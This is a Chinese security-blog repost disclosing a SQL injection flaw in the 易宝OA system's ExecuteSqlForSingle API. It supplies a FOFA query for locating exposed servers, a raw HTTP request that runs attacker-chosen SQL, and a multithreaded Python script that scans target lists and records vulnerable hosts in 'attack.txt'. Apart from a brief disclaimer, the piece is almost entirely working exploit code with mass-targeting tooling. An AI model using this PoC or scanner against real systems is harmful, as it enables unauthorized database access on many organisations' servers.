【最新漏洞】易宝OA ExecuteSqlForSingle SQL注入漏洞[附批量脚本]

admin 2023年11月28日14:46:30评论84 views字数 1436阅读4分47秒阅读模式

关注本公众号 ,长期推送漏洞文章

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

漏洞简介

易宝OA存在SQL注入漏洞,

fofa:product="顶讯科技-易宝OA系统"

资产:

【最新漏洞】易宝OA ExecuteSqlForSingle SQL注入漏洞[附批量脚本]

漏洞复现

使用Burp或Yakit进行抓包改包

【最新漏洞】易宝OA ExecuteSqlForSingle SQL注入漏洞[附批量脚本]

POC

POST /api/system/ExecuteSqlForSingle HTTP/1.1Host: IP:PORTContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 103
token=zxh&sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)&strParameters


批量测试

【最新漏洞】易宝OA ExecuteSqlForSingle SQL注入漏洞[附批量脚本]

import requestsimport concurrent.futures
def check_vulnerability(target):
headers = { "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", "Content-Type": "application/x-www-form-urlencoded" } data = { "token": "zxh", "sql": "select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)", "strParameters": "" } try: res = requests.post(f"{target}/api/system/ExecuteSqlForSingle", headers=headers,data=data,timeout=5) if "e10adc3949ba59abbe56e057f20f883e" in res.text and "success" in res.text: print(f"{target} 漏洞存在") with open("attack.txt", 'a') as f: f.write(f"{target}n") else: print(f"{target} 漏洞不存在") except: print(f"{target} 访问错误")
if __name__ == "__main__": f = open("target.txt", 'r') targets = f.read().splitlines()
# 使用线程池并发执行检查漏洞 with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor: executor.map(check_vulnerability, targets)

脚本获取方式:关注本公众号,后台回复“1105”

后台回复“交流群”获取技术交流群链接


原文始发于微信公众号(知攻善防实验室):【最新漏洞】易宝OA ExecuteSqlForSingle SQL注入漏洞[附批量脚本]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月28日14:46:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【最新漏洞】易宝OA ExecuteSqlForSingle SQL注入漏洞[附批量脚本]http://cn-sec.com/archives/2243941.html

发表评论

匿名网友 填写信息